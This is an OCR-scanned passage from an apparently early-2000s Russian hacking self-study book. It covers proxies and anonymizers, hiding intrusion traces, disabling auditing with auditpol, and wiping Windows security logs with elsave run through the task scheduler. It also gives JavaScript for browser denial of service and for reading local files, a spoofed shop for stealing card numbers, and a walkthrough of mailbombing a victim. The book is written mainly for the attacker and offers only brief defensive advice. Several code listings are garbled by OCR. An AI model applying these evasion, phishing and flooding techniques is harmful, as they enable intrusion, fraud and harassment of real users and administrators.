у серверов Интернета, можно обратиться к Web-сайту по адресу
http://www.privacy.net/analyze, который предоставляет услуги по анализу информации, которую может извлечь Web-сервер из клиентского компьютера.
Как видно из Рис. 4.4, этот сервер Интернета без проблем определил операционную систему клиентского компьютера, используемый Web-браузер, время запроса и ГР-адрес сервера провайдера Интернета.
3l Analyze Your Internet Privacy — Microsoft Internet Explorer
Файл

^^^^»

^^^^~

Правка Вид Избранное

•BBSBBBgg

Сервис Справка

а

**- Назад ^

Переход
Your Browser Type and Operating System:
Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler)
All Information sent by your web browser when requesting this web page:
Accept: */* Accept-Language: ru Connection; keep-alive Host: www.privacy.net UserAgent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler) Cookie:
Date=1/30/2002; Privacy. net=Privacy+Analysis Via: 1.1 cea15. 1.1
proxy.iptelecom.net.ua:3128 (Squid/2.4.STABLE3) X-Forwarded-For: 212.9.232.151,
212.9.224.89 Cache-Control: max-age=259200

a_

Интернет

Рис. 4.4. Фрагмент Web-страницы с результатом анализа конфиденциальности
Более того, на этой же странице чуть ниже (здесь это не видно) представлены
результаты запроса одного из серверов Whols, о которых мы рассказывали в
Главе 1, содержащие регистрационные сведения о домене провайдера Интернета
вместе с телефонами администраторов сети.
Ясно, что обладание такой информацией выдает ваше местоположение с головой — для этого нужно только просмотреть на сервере удаленного доступа провайдера все регистрационные журналы и найти запись, фиксирующую информацию о подключении клиентского компьютера с данным IP-адресом в указанное время и с указанного телефона. Так что недаром ныне многие Web-сайты на
загруженной Web-странице отображают предупреждение о том, что серверу известен IP-адрес клиентского компьютера — и в случае несанкционированных
действий последствия гарантированы…

65
3 — 5830

Самоучитель хакера

Чтобы избежать такого развития событий, следует обратиться к сервисам, предоставляемым некоторыми Web-узлами, которые на компьютерном сленге называются «анонимайзерами» (от английского слова «anonymizer» — средство
сохранения анонимности). Анонимайзер представляет собой службупосредник, исполняемую на Web-сервере, с помощью которой пользователь
может путешествовать по Сети согласно командам, отдаваемым с браузера
своего компьютера. Такую услугу предоставляет, например, анонимайзер по
адресу http://www.anonymizer.com. (Рис. 4.5).
Anonymizer.com — Onlinu Privacy Sorvic
4-Назад — •» — О и 1Й | ОПоиск СВ Избранное U»Журнал [ ife-r ^ И » В
Адрас Цй hup.//wwwanonymteBf.coin.

Anonymizer.com
Мии(| AboutPrivacy’

FIND IT • STO

S

spyCap
«•••• •»’•«»

:

Рис. 4.5. Для анонимного посещения Web-сайта
просто введите в строку его адрес и щелкните на кнопке Go.
Все последующие ссылки будут направляться от лица анонимайзера
Анонимайзеры — эффективное средство для обеспечения анонимности, но они
не лишены недостатков — не все анонимайзеры разрешают FTP-доступ, и многие, в качестве дополнительной «нагрузки», заставляют некоторое время просматривать свои рекламные объявления. Кроме того, учтите, что анонимайзеры,
как и все Web-серверы, также ведут регистрационные журналы, фиксирующие
своих посетителей. И если для обычных граждан эти журналы недоступны
(в этом и состоит суть услуг анонимайзеров), то для необычных граждан в принципе нет ничего невозможного.

Сделать свои путешествия по Web анонимными можно также с помощью прокси-серверов, указывая их параметры в разделе Прокси-сервер (Proxy server)
диалога настройки удаленного подключения (Рис. 4.6).

66

Сокрытие следов
-Автоматическая настройка

‘»
Использование автоматической настроит может изменить установленные
вручную параметры. Для использования ручной настройки отключите
автоматическую настройку,
D Автоматическое определение настроек
Q Использовать сценарий автоматической настройки
Адрес
0 Использовать прокси-сервер
Адрес:

|www.anonymize| Порт; J8080

[дополнительно…!

D Не использовать прокси-сервер для локальных адресов
-Настройка удаленное
Имя пользователя:
Пароль:
Домен:

1
1
1

Свойства
|

Настройка

П Не использовать это соединение в программах Интернета

Рис. 4.6. Указание адреса прокси-сервера в настройках удаленного доступа
Прокси-сервер работает, по сути, как анонимайзер, т.е. при запросах Web-сайтов
на серверах будет регистрироваться адрес прокси-сервера, но есть и некоторые
отличия.
• Прокси-сервер не отменяет использование файлов куки.
• Прокси-сервер позволяет работать как с HTTP, так и с FTP-серверами, что
дает возможность сделать анонимными не только посещения Web-сайтов, но
также и загрузку файлов по протоколу FTP.
• Если использовать адрес прокси-сервера своего провайдера Интернета, угроза идентификации вашего компьютера остается.
• В любом случае прокси-сервер не защитит вас от следопытов со специфическими возможностями.
Для преодоления последнего недостатка можно воспользоваться услугами прокси-сервера постороннего провайдера. Его можно найти, например, с помощью
поисковых машин, предоставляемых различными Web-сайтами, скажем, Yahoo.
Наберите в строке поиска proxy+server+configuration+Explorer, и в ответ вы
получите множество Web-страниц, принадлежащих провайдерам Интернета, с
описанием способов настройки их прокси-серверов. Затем попробуйте настроить
на эти прокси-серверы свое удаленное соединение с провайдером Интернета и,
как правило, после нескольких попыток у вас это получится.

67

Самоучитель хакера

Сокрытие следов атаки
Итак, вы уже усвоили, что, подобно обычному грабителю, никакой настоящий
хакер, побывав в чужом компьютере, не захочет оставить после себя следы, которые могут привлечь к нему внимание. Перед уходом из системы он создаст в
ней потайные ходы, поместив в систему клавиатурного шпиона, например, описанного в Главе 3 кейлоггера IKS. Или же установит в компьютер утилиту удаленного администрирования взломанной системы, например, трояна NetBus
(http://www.netBus.org). Но после всего этого хакеру потребуется уничтожить
все следы своего пребывания в системе или, как минимум, сделать так, чтобы
информация о его посещении, зарегистрированная системой защиты, не позволила определить его личность.
Вот какие методы чаще всего используются взломщиками для сохранения анонимности и скрытия следов атаки:
• Самое лучшее — это использовать для хакинга в Интернете посторонние компьютеры, доступ к которым не контролируется в должной степени (а таких
компьютеров в любой организации — хоть пруд пруди).
• Можно подменить IP-адрес хакерского компьютера, использовав промежуточный анонимайзер или прокси-сервер, как мы уже обсуждали это выше
в этой главе.
• Чтобы скрыть установленные на взломанном компьютере хакерские программы, можно изменить стандартные номера портов этих программ, что затрудняет их выявление. Например, широко известная программа Back Orifice 2000
вместо стандартного порта 31337 может быть перенастроена на использование, скажем, порта 31336, и программы, анализирующие открытые порты компьютера, могут быть введены в заблуждение.
• Обязательно следует очистить журналы регистрации событий безопасности,
которые заполняются средствами аудита систем Windows NT/2000/XP. Чтобы
отключить средства аудита, взломщик может прибегнуть к утилите auditpol
пакета W2RK, или какой-нибудь другой хакерской утилите, например, elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm). Проще всего это
можно сделать с помощью аплета Просмотр событий (Event Viewer) на панели управления Windows 2000/XP.
• Можно скрыть файлы и папки, скопированные во взломанный компьютер,
установив в диалоге свойств файлов и папок флажок Скрытый (Hidden).
Установка этого атрибута делает файл или папку невидимой в окне проводника
Windows, если только не был установлен режим отображения скрытых файлов.
• Можно скрыть процессы, исполняемые хакерскими программами. Хакер
может замаскировать запущенную им службу или программу, изменив ее
68

Сокрытие следов
имя на совершенно нейтральное, например, explorer.exe, которое в окне
диспетчера задач Windows можно будет спутать с обычным приложением
проводника Windows.
• Более сложным являются случаи скрытия процессов хакерских программ за
именами других процессов с помощью программ, подобных EliteWrap, описанной в [11].
• Наиболее совершенным методом скрытия хакерских программ следует считать
использование так называемых руткитов (от английского слова Rootkit — базовый комплект инструментов). При этом подлинные программы ядра операционной системы подменяются хакерскими утилитами, выполняющими функции
входной регистрации пользователей, ведения журнала нажатых клавиш и пересылки собранных данных по сети.
Для противостояния таким трюкам существуют специальные программные
средства контроля целостности компьютерной информации. В качестве примера
можно назвать приложение Tripwire (http://www.tripwiresecurity.com), которое
позволяет выполнять контроль целостности файлов и папок, и приложение Cisco
Systems (http://www.cisco.com) для проверки и анализа содержимого журналов
регистрации. Системы Windows 2000/XP также предоставляют встроенный инструмент проверки целостности файлов, про работу с которыми можно узнать,
например, в [7].

Отключение аудита
Аудит, несомненно, является одним из наиболее серьезных средств защиты от
хакинга компьютерной системы, и отключение средств аудита — одна из первых
операций, которую выполняют хакеры при взломе компьютерной системы. Для
этого применяются различные утилиты, позволяющие очистить журнал регистрации и/или отключить аудит системы перед началом «работы».
Для отключения аудита хакеры могут отключить политику аудита штатными
средствами настройки системы защиты Windows NT/2000/XP, однако лучше прибегнуть к более мощному средству, предоставляемому утилитой auditpol.exe из
комплекта инструментов W2RK. С ее помощью можно отключать (и включать)
аудит как локального, так и удаленного компьютера. Для этого следует из командной строки ввести такую команду:

C:\Auditpol>auditpol \\ComputerName /disable
Running…
Audit information changed successfully on \\ComputerName …
New audit policy on \\ComputerName …
(0) Audit Disabled

69

Самоучитель хакера
System
Logon
Object Access
Privilege Use
Process Tracking
Policy Change
Account Management
Directory Service Access
Account Logon

= No
= No
= No
= No
= Success and Failure
= No
= No
= No
= No

Здесь //ComputerName — имя удаленного компьютера, а ключ /disable задает
отключение аудита на этом компьютере. Утилита auditpol.exe — весьма эффективное средство, созданное для управления сетевыми ресурсами, но также, как
видим, весьма удобный инструмент хакинга (ввод команды auditpol /? отображает справочную информацию о применении утилиты).

Очистка журналов безопасности
Для очистки журнала безопасности с помощью специального аплета на панели
управления Windows 2000/XP следует выполнить следующие действия:
> Щелкните на кнопке Пуск (Start) и в появившемся главном меню выберите
команду Настройка ••Панель управления (Settings • Control Panel).
File

Action

View

Help

Event Viewer [Local]
I Type I Description
Application Error Record!

I Sire
512…

Delete all records n the log

Puc. 4.7. Очистка журнала событий безопасности средствами Windows
70

Сокрытие следов
В отобразившейся Панели управления (Control Panel) откройте папку
Администрирование (Administrative Tools).
Дважды щелкните на аплете Просмотр событий (Event Viewer). На экране
появится окно Event Viewer (Просмотр событий) (Рис. 4.7).
Щелкните правой кнопкой мыши на пункте Безопасность (Security Log);
появится контекстное меню.
Выберите команду Clear all Events (Стереть все события). Отобразится диалог, представленный на Рис. 4.8, с предложением сохранить журнальные
события в файле.

Do you want lo save «Security» before clearing it?
Yet

No

Cancel

Puc. 4.8. Запрос о необходимости сохранения журнала безопасности
> Щелкните на кнопке Нет (No), если вам больше не требуются зафиксированные в журнале события. Журнал будет очищен.
При выполнении очистки журнала безопасности обратите внимание на тот факт,
что после выполнения этой операции в журнал сразу же записывается новое событие аудита — только что выполненная операция очистки! Таким образом, хакер все
же оставит свой след — пустой журнал с зафиксированным событием очистки
журнала. Этот недостаток можно исправить, применив для очистки журнала хакерскую утилиту elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
Эта утилита предназначена, в первую очередь, для очистки журналов
Windows NT 4, но ее последняя версия работает и с системой Windows 2000.
Вот как она запускается из командной строки.
C:\els004>elsave -s \\ComputerName -С
Здесь ключ -s задает режим удаленной очистки, а ключ -С задает операцию
очистки журнала. Кроме очистки, утилита позволяет копировать события журнала в файл. Ввод команды elsave /? приводит к отображению справки, и вы
можете сами испытать эффективность всех предлагаемых возможностей.
Элементарная проверка показывает, что отмеченный выше недостаток остался применение утилиты elsave.exe регистрируется в журнале безопасности как событие очистки журнала. Однако теперь мы можем сделать следующий трюк — поместить задание на очистку журнала утилитой elsave.exe в планировщик заданий
Windows (запустив его или из меню Пуск (Start), либо командой AT из командной
строки MS-DOS). Планировщик выполнит операцию очистки под учетной записью System, что сильно затруднит поиски хакера.
71

Самоучитель хакера

Заключение
Сокрытие следов своей работы на компьютере и сохранение своей конфиденциальности в Интернете — это непременное условие для успешной деятельности
хакера без особых помех (по крайней мере, какое-то время). Так что не стоит
пренебрегать мерами своей защиты, по крайней мере, до приобретения некоторого опыта. Как показано в этой главе, обеспечение своей безопасности и конфиденциальности вовсе не так сложно, если твердо, раз и навсегда преодолеть
ложное ощущение своей анонимности и недосягаемости во время пребывания в
виртуальном киберпространстве, особенно на чужой территории. И перестаньте
пользоваться домашними телефонами — не ройте яму самому себе! Ведь 50%
(вдумайтесь — половина!) всех так называемых «хакеров» лезут в чужой огород с
домашнего телефона — большего идиотизма трудно себе представить!
Для антихакера все эти соображения также имеют самое непосредственное значение — пребывая в киберпространстве, очень просто вступить в конфликт с чужими интересами или с путаными и туманными законами разных стран, или попасть под пристальное внимание личностей самого разного рода занятий и наклонностей [9]. Ведь недаром ныне на рынке программных продуктов все активнее предлагаются программы для защиты компьютерной конфиденциальности, например, Norton Personal Firewall, PGP Desktop Security и другие. Не стоит
ими пренебрегать, если вы хотите комфортно чувствовать себя во время пребывания в виртуальном компьютерном мире, который ныне все больше и больше
пересекается с нашим реальным, физически ощутимым миром.

72

ГЛАВА 5

Хакинг #рауз
До сих пор, расписывая деяния хакеров в виртуальном компьютерном мире, мы
ограничивались автономным компьютером, предполагая, что у хакера имеется
локальный доступ к консоли компьютерной системы. Однако, как вы сами понимаете, огромный виртуальный мир Интернета никак не может быть оставлен
без внимания хакеров, поскольку в этом мире имеется очень много полезных
ресурсов и личностей, готовых с ними расстаться, причем безвозмездно.
Более того, именно после возникновения в середине 90-х годов прошлого столетия общедоступной сети Интернет, хакинг приобрел настоящую силу и мощь.
Путешествуя по серверам Интернета, хакер может с помощью своего компьютера проникать во все уголки этого пространства, преследуя при этом свои цели.
Далее в этой книги мы займемся обсуждением этих возможностей, а сейчас сделаем несколько замечаний, уточняющих терминологию, используемую далее
при описании средств хакинга в Интернете.
Итак, Интернет представляет собой объединение множества сетей, состоящих из
серверов и клиентов, взаимодействующих согласно стеку протоколов TCP/IP.
• Клиенты — это прикладные программы, предназначенные для установления
соединения с компьютерами сети с целью получения нужной информации.
• Серверы — это прикладные программы, которые предназначены для установления связи с клиентами, получения от клиентов запросов и отправки ответов.
Обычно серверы функционируют на мощных компьютерах, соединенных друг с
другом магистральными линиями связи с большой пропускной способностью.
Клиенты функционируют, как правило, на сравнительно менее мощных компьютерах, подсоединенных к серверам с помощью значительно менее быстродействующих линий связи (например, телефонных линий).
Серверы управляют доступом к информационным ресурсам Интернета, руководствуясь запросами клиентов. Этими ресурсами может быть любой объект,
содержащий информацию, например, файл базы данных, документ Word и т.д.,
или любая служба, позволяющая, например, звонить по телефону или выполнять
финансовые операции через Интернет.
Основные ресурсы Интернета содержатся в сети WWW (World Wide Web — Всемирная паутина), или просто Web (Паутина). Сеть Web — это одно из прикладных применений сети Интернет, хотя очень многие люди считают термины
Интернет и Web синонимами. Однако это не так — если возникновение сети
Интернет можно отнести к 1961 году, то сеть Web возникла в 1992 году и ее развитие связано с появлением гипертекстовых информационных систем.
Гипертекстовые информационные системы отличаются тем, что позволяют обращаться к хранимому в них гипертексту в произвольном порядке, определяв-

Самоучитель хакера
мом гиперссылками. Именно так и организована сеть Web — множество страничек Web представляет собой гипертекст, содержащий множество гиперссылок
на информационные ресурсы, хранимые на серверах сети Web.
Сеть Web функционирует с опорой на следующие технические средства.
• Единую систему наименований ресурсов Web, делающую возможным их поиск по серверам Web и основанную на так называемых адресах URL (Uniform
Resource Locator — Унифицированный указатель информационного ресурса),
определяемых протоколом доступа к серверам Web.
• Протокол организации сетевого доступа к именованным сетевым ресурсам, в
качестве которого в Web выступает протокол HTTP (Hyper Text Transfer
Protocol — Протокол передачи гипертекстовых файлов).
• Гипертекст, облегчающий навигацию по ресурсам Web, для создания которых используется язык HTML (Hyper Text Markup Language — Язык разметки
гипертекста).
Чтобы облегчить вам знакомство с этими средствами, обратитесь к литературе,
перечисленной в конце книги, в которой обсуждаются основные средства и протоколы Интернета — язык HTML и протоколы CGI и HTTP.
Все указанные средства Web интересны для хакеров прежде всего тем, что недостатки системы защиты серверов и клиентов, обслуживающих функционирование Web, позволяют им выполнять некоторые весьма интересные трюки, результатом которых может быть что угодно — потеря денег на счетах, утрата работоспособности компьютера, раскрытие конфиденциальности разного рода документов — в Главе 1 мы привели несколько сообщений из Web о последних
«достижениях» в этой области.
Рассмотрим некоторые из приемов хакинга в Web и начнем, естественно, с основы основ сети Web — языка HTML и клиентов Web, называемых браузерами
(от английского слова browser, дословно означающего «человек, перелистывающий книги» или «животное, объедающее побеги»), которые отображают
пользователям Web содержимое Web-страниц.

Злонамеренный код ИТМР
Язык HTML — это средство создания страниц Web, основная функция которого
состоит в форматировании текстового содержимого страницы Web, вставки в
текст графики, мультимедийной информации, например, звука, различных интерактивных элементов, таких как списки, кнопки и, наконец, сценариев. Таким образом, с помощью языка HTML обычный текстовый документ можно превратить
в настоящую программу, которая исполняется браузерами Web, чаще всего, Internet Explorer (ffi) и Netscape Navigator (NN).
74

Хакинг браузеров Web
Хакер рассуждает таким образом: раз страничка Web — это программа, то почему бы не заставить код HTML странички Web делать то, что нужно мне, а не то,
для чего язык HTML, собственно, предназначен — воспроизведения информационных ресурсов на серверах Web? Тогда первый вопрос — что может сделать
этот код HTML? Небольшие исследования в этом направлении показывают что очень многое. Ниже перечислены некоторые (далеко не все) из хакерских
штучек, которые могут заставить поволноваться пользователя, путешествующего по Интернету с помощью Web-браузера.

Генерация диалогов
По сути, это атака DoS на компьютер клиента Интернета, выполняемая включением в страничку Web простейших сценариев. Эти сценарии могут, скажем,
бесконечно генерировать все новые и новые странички Web, которые браузер
будет отображать на экране, пока не переполнит память компьютера.
Проще всего эту атаку можно выполнить с помощью команды open ( ) , которая в
бесконечном цикле сценария JavaScript в страничке MainPage.html отображает эту
же страничку до переполнения памяти, как это сделано в коде HTML Листинга 8. 1.
Листинг 8.1.
Код HTML для бесконечного генерирования диалогов Web-странички

< SCRIPT LANGUAGE* » JavaScript » >
generation () ;
function generation () {
var d=0;
while (true) {
a = new Date;
d = a.getMilliseconds( ) ;
window. open («MainPage. html», d, «width=250, height =250») ;

Если вы решите повторить этот и последующие эксперименты с
кодом HTML, то предварительно закройте все приложения и запустите диспетчера задач, чтобы вовремя прекратить открытие все новых и новых диалогов. Хотя системы Windows 2000/XP
с браузерами IE 5 и IE 6 устойчивы к ошибкам в кодах HTML, лучше
подстраховаться .

75

Самоучитель хакера
Воспроизведение такого кода браузерами IE 5 и IE 6 приведет к стопроцентной
загрузке процессора и заполнению экрана пустыми диалогами.

tlepеполиеиие памяти
В других злонамеренных сценариях выполняют еще более простой трюк — записывают переменную с очень длинным идентификатором. Например, в Листинге 8.2
идентификатор хххххх… ххххх содержит несколько тысяч символов х (здесь
они не воспроизведены для экономии места).
Листинг 8.2.
Код HTML переполнения памяти в сценарии Web-страницы

var p = external.ХХХХХХ… ХХХХХ;

Результатом воспроизведения кода HTML из листинга 8.2 браузером IE версий 5
и 6 будет отображение сообщения об ошибке в строке оператора декларирования переменной var p из Листинга 8.2.
Список подобного рода «сценариев» и проделываемых с их помощью «трюков»
воистину безграничен (примеры можно найти в [3], [10]). Мы, однако, не будем
на них останавливаться и рассмотрим более сложный пример — запуск из кода
HTML программ на клиентском компьютере.

ск программ
В [3] описан метод запуска любых локальных программ с помощью кода HTML,
содержащего тег с ненулевым значением идентификатора CLSID.
В листинге 8.3.представлен код HTML, реализующий указанную возможность.
Листинг 8.3.
Запуск локальных программ из кода HTML

При загрузке кода из листинга 8.3 в браузер IE 6 отображается окно браузера,
представленное на Рис. 5.1.

76

Хакинг браузеров Web
JQ C:\Documenl. and Selling*\Alex4Mj> DocuroenUSWork D… [Г)Б1Гх1

Рис. 5.1. Запуск программы калькулятора из кода HTML
В данном случае была запущена программа Калькулятор из папки C:\Windows\
system32\calc.exe, однако ничего не мешает злоумышленнику запустить подобным образом программу форматирования дисков локального компьютера, расположенную в том же каталоге.

Система защиты Web-браузеров построена таким образом, чтобы сценарии
JavaScript, помещаемые в HTML-код Web-страниц, не имели доступа к локальной файловой системе компьютера. Однако и здесь имеется лазейка, связанная с
тегом IFRAME, предназначенном для внедрения в текст Web-страницы небольших фреймов.
В листинге 8.4 представлен код HTML, позволяющий сценарию прочесть файл,
хранящийся в корневом каталоге клиентского компьютера C:\security.txt.
Листинг 8.4.
Открытие
локальных

файлов

из

сценария

Web-странички _

Чтение файла C:\security.txt

alert («Ваш файл содержит такие сведения:
\n » +b . document . body . innerText ) ;

77

Самоучитель хакера
II.navigate(«file://с:/Security.txt»);
setTimeout(‘Il.navigate(nfile://C:/Security.txt»)’,1000);

Загрузка кода из Листинга 8.4 в браузерах IE 5 и IE 6 приводит к отображению окна браузера, представленного на Рис. 5.2.

File

Edit

View

Favorite*

Tools

Help

QMd.-0-й и

Чтение файла C:\security.txt

Как видно из Рис. 5.2, содержимое
Это очень большой секрет
файла security.txt — строка Это очень
большой секрет — отобразилось во
фрейме внутри Web-странички. Таким
образом, получив доступ к локальной
файловой системе, можно подумать и
о дальнейшей работе с ее ресурсами и учтите, что сценарии JavaScript позволяют выполнять отправку элекРис. 5.2. Сценарий Web-странички
тронных писем по указанному адресу.
сумел прочитать локальный файл
Данная уязвимость Web-браузеров
связана с ошибками в реализации события NavigateComplete2, которое сообщает о завершении перемещения документа на новое место [3].

Подмена Web-caumo&
Все описанные выше атаки могут сильно испортить нервы беспечного Webпутешественника, но, как правило, дело только этим и ограничивается — реальный вред с помощью загруженных с Web-страницей враждебных аплетов и сценариев нанести достаточно сложно. Подобные атаки практически не опасны, если
защита Web-браузера настроена на блокирование не сертифицированных элементов ActiveX, и не выполняет в автоматическом режиме загруженные сценарии.
Однако имеется другая разновидность хакинга, основанная исключительно на
мошенничестве, и ориентированная на извлечение финансовых средств у всех
тех личностей, которые, стремясь идти в ногу со временем, обзаводятся кредитными карточками, счетами в Интернет-банках, используя их для покупок
в Интернет-магазинах и т.д. При этом мало кто из счастливых обладателей
Интернет-карточек представляет, как работает механизм, обслуживающий их
покупки. Многие вообще не интересуются, как будут использоваться владельцами виртуального магазина переданные им совершенно конфиденциальные
данные — номер и другие платежные реквизиты кредитной карточки.
78

Хакинг браузеров Web
Все это — сущий клад для хакера, поскольку все что нужно сделать для обмана
покупателей — это создать Web-сайт, копирующий внешний вид электронного
магазина известной фирмы. Далее, распространив ссылки на этот сайт по всему
Интернету, хакер может без проблем продавать виртуальный воздух и снимать
деньги со счетов доверчивых посетителей.
Другая возможность, которую открывает для хакеров фальсификация Webстраниц — предоставление возможностей для загрузки злонамеренных программ. Например, вместо загрузки нового пакета обновления системы Windows
с Web-сайта Microsoft вы можете загрузить и запустить троянского коня наподобие уже упоминавшейся программы NetBus.
Сейчас мы опишем технику фальсификации Web-сайта, имитирующего виртуальный «Шоп» по продаже «виртуального воздуха» всем богатеньким и тупым «ламерам». Эта техника достаточно проста и заключается в помещении на Webстранице злоумышленника ссылки на сценарий, генерирующий прямо на компьютере пользователя фальсифицированный ресурс. В листинге 8.7 приведен пример кода HTML, реализующего фальсифицированный Интернет-магазин.
Листинг 8.7.
Пример фальсификации документа HTML

Фирма
Bubliki&Baranki
предлагает
своим
посетителям
ВСЕ!!!!!

Если пользователь не обратит внимания на мелкую деталь — строку Адрес
(Address) с несколько странным содержимым, он может и не заметить подмены
реального магазина фальсифицированным «Шопом», в результате которой номер его кредитной карточки перекочует в базу данных злоумышленников со
всеми, как говорится, вытекающими последствиями.
В старых версиях браузера IE можно было без проблем манипулировать строкой Address из сценария Javascript. Хакеры легко
скрывали содержимое этой строки ложным адресом URL Для иллюстрации кода HTML здесь был использован браузер IE 6, который весьма затрудняет подобные действия; более того, IE 6 предупреждает о наличии в коде HTML средств для манипулирования
отображаемыми данными. Так что будьте начеку!
Другой, не менее интересный способ перехвата конфиденциальных данных,
которыми обменивается Web-браузер с сервером — это снифинг сетевых соединений. Перехватывая передаваемые по сети пакеты с номерами кредитных карточек, паролями и прочими интересными сведениями, хакеры могут достичь
очень многого, о чем мы еще расскажем далее в этой книге.

Методы социальной инженерии
Познакомившись с методами хакинга клиентов Интернета, вы, наверное, сами
поняли, что во время путешествий по Web ухо следует держать востро. Недостатки реализации программного обеспечения и некорректная настройка параметров системы защиты браузера позволяют хакеру вытворять прямо чудеса.
Однако наиболее эффективным методом, очевидно, следует считать элементарное мошенничество, основанное на доверчивости и неопытности Webпутешественников.
В предыдущем разделе показано, как легко создать собственный вариант
Web-магазина известной фирмы и начать продавать там виртуальный воздух
в обмен на реальные деньги. Этим возможности хакера отнюдь не ограничиваются. Предложения «бесплатно» загрузить «чудо-программу», согласиться на загрузку странички с аплетом без сертификата от доверенного провайдера, щелкнуть на ссылке и просмотреть «глобальные» возможности различных сайтов все это сразу же окружает пользователя, появившегося на сайте Интернета с

81

Самоучитель хакера
тщательно обезличенным авторством, но очень конкретными целями. Вот что
из этого может получиться.
Загрузив и запустив без всякой проверки распаковку файла программы, вы можете элементарно очистить свой жесткий диск, установить в компьютере
трояна или заразить компьютер вирусом. А поддавшись на уговоры купить
что-либо на Web-сайте, вы можете подвернуться атаке кардера — так называют
хакеров, собирающих номера кредитных карточек у доверчивых простаков.
Основные средства защиты от всех этих напастей таковы:
• Никому не доверять. Все сайты, предлагающие штатные услуги, должны
иметь сертификат от надежного поставщика и обеспечивать защищенные соединения по протоколу SSL.
• Регулярно обновлять Web-браузер и поддерживать настройки его системы
защиты на должном уровне.
• Использовать антивирусы.
Всего этого может оказаться недостаточно, если вы столкнетесь с настоящим хакером, который владеет более серьезными приемами хакинга, чем описанные в
этой главе. Однако для большинства случаев годятся и перечисленные выше меры.
В следующей главе мы углубимся в более изощренные методы хакинга, связанные с электронной почтой. Оказывается, что ныне можно получить такое письмецо, что от вас не потребуется вообще ничего, чтобы стать виртуальным рабом
некоего умельца, специализирующегося на комбинации кодов почтовых посланий. Этими комбинациями мы и займемся.

Заключение
Клиент Web — это весьма притягательный для хакера объект. Ныне виртуальное
киберпространство можно сравнить разве что с территорией, на которой идет
непрерывное сражение за выживание. Чтобы победить в этом сражении, антихакеру следует уметь защищаться, например, настраивать параметры системы защиты браузера и работать с антивирусными пакетами, проверяющими загружаемые из Web сценарии и аплеты. Однако все это вам не поможет, если не
помнить все время одну простую истину — будучи в Web не доверяйте
НИКОМУ, НИЧЕМУ, НИГДЕ и НИКОГДА — и, быть может, обойдется.
Хакеру же следует учесть, что жизнь не стоит на месте и то, что вполне толково
работало в версии 4 браузера IE и Netscape, ныне, в версиях 5 и 6 уже не функционирует. Стало быть следует все время заботиться о совершенствовании
своих умений, помня при этом, что другим людям ваши делишки могут и не
понравиться.
82

Г Л А В А 6.

Деструкция почтового клиента
В этой главе мы опишем крайние разрушительные действия хакеров, направленные на развал всей системы электронной почты любыми методами, включая
взлом паролей доступа к почтовым ящикам, мейлбомбинг, мошеннические приемы раскрытия паролей доступа к почтовым ящикам и запуска троянских коней на
компьютере ламера, попавшегося на крючок толковому «кул хацкеру».
Все описываемые далее методы хакинга требуют от хакера
тщательного скрытия своего местопребывания и вообще любых
сведений, могущих навести на его след разнообразных блюстителей порядка в киберпространстве. Если вы захотите попробовать на практике все описанные далее приемы хакинга, настоятельно рекомендуем ограничиться экспериментальной интрасетью, и никогда никому не рассказывать о своих занятиях. Если же
вы захотите попробовать свои силы в Интернете, то учтите,
что этим самым вы переступаете за некую красную черту, после
чего может наступить все, что угодно, за что автор не несет
никакой ответственности и вообще не советует… Короче, думайте сами — вас предупредили!

Мейлбомберы и мейлбомбинг — это одна из самых излюбленных забав личностей наподобие доктора Добрянского (да, да, того самого, из Главы 1, с лысым
обугленным черепом и хаотической походкой). В самом деле, ну что может быть
забавнее, чем завалить всяким бессмысленным хламом почтовый ящик вашего
недруга или просто первой попавшейся личности, встретившейся на прогулке в
киберпространстве! Пусть потом этот бедолага разгребает полученный мусор, да
еще и объясняется с системным администратором почтового сервера. Хотя зачем заниматься рассылкой писем? Ведь можно сделать еще проще — подписать
свою жертву на рассылку кухонных рецептов или спортивных новостей — и пусть
всю работу возьмут на себя владельцы сайтов — распространителей подписки.
Все такие послания называются флудом (от английского слова Flood — заливка,
затопление) или спамом (от английского слова Spam — колбасный фарш, консервы. Причина применения слова Spam в компьютерной технологии остается загадкой). Чтобы «зафлудить» чужое «мыло» (т.е. забить мусором электронный
почтовый ящик своего недруга), существует множество программ, причем весьма высокоразвитых, позволяющих без всяких проблем переслать кучу случайно
сгенерированных сообщений по указанному адресу. Флудеры к тому же умеют
скрывать реальный почтовый адрес отправителя, используя для этого прокси-

Самоучитель хакера
серверы и анонимные SMTP-ретрансляторы. Мы опишем работу такого мейлбомбера на примере программы со страшным названием Death & Destruction
Email Bomber (Смертельный & Всесокрушающий мейлбомбер) версии 4.0,
сокращенно называемой DnD (http://www.softseek.com/Utilities/VBRUN_Files/).
Читатели могут без труда найти в Интернете множество других мейлбомберов, выполнив поиск по строке запроса «мейлбомбер». Функциональные возможности мейлбомберов могут разниться по числу предоставляемых инструментов, и мы выбрали
DnD, посчитав его наиболее высокоразвитым программным средством. В дополнение к нему особенно рекомендуем познакомиться с
мейлбомбером Avalanche — по возможностям Avalanche не уступает
мейлбомберу DnD, а кое в чем и превосходит его.
На Рис. 6.1 представлено рабочее окно мейлбомбера DnD 4.O.

м-ш

Death and Desliuclion 4.0
File

Clones

Header»

Session

Random Lists

Mailing Lilts

Window

Extras

ттт
Send bomb to:
Say bomb is from: I
Message Subject: I

_pj

CC:

|7| 0 Randomly Change | EdilL
] 0 Randomly Change | Edit List

Message Body:
| SMTP Spy

jendjombjl | Edil Headers | | Abort | | Clear | | Clone | fy

Help

Email Bombing is rarely damaging
to the target but is always
damaging to smtp hosts. I do NOT
condone mailbombing as it
causes problems for SysAdmins of
servers. I did not make this
program for people to blast away
at each other. PLEASE use it
responsibly, and if you HAVE to
email bomb, then please use the
option to randomly switch servers
in between messages; as it
lightens the loads on the server.
Have fun and don’t ruin a good
sysadmins time by flooding his
server!

i-Size of BombIB И Randomly Change [ — ,Usages to send:
-m— I
Edit Server list
JI
1 I O Never ending bomb

20.01.2003».

use the Edit He»

Puc. 6.1. Набор инструментов DnD весьма обширен
Чтобы разобраться в возможностях программы DnD, давайте для пробы «зафлудим мыло» нашего ламера Коли, работающего на компьютере А1ех-1. Для этого
мы вначале перешлем Коле десяток посланий со случайно сгенерированным содержимым, постаравшись сохранить свою анонимность (на всякий случай).
Выполнение такой атаки требует специальной настройки параметров мейлбомбера и подготовки почтовой бомбы.
Рассмотрим эти задачи по порядку.
84

Деструкция почтового клиента

Снаряжение
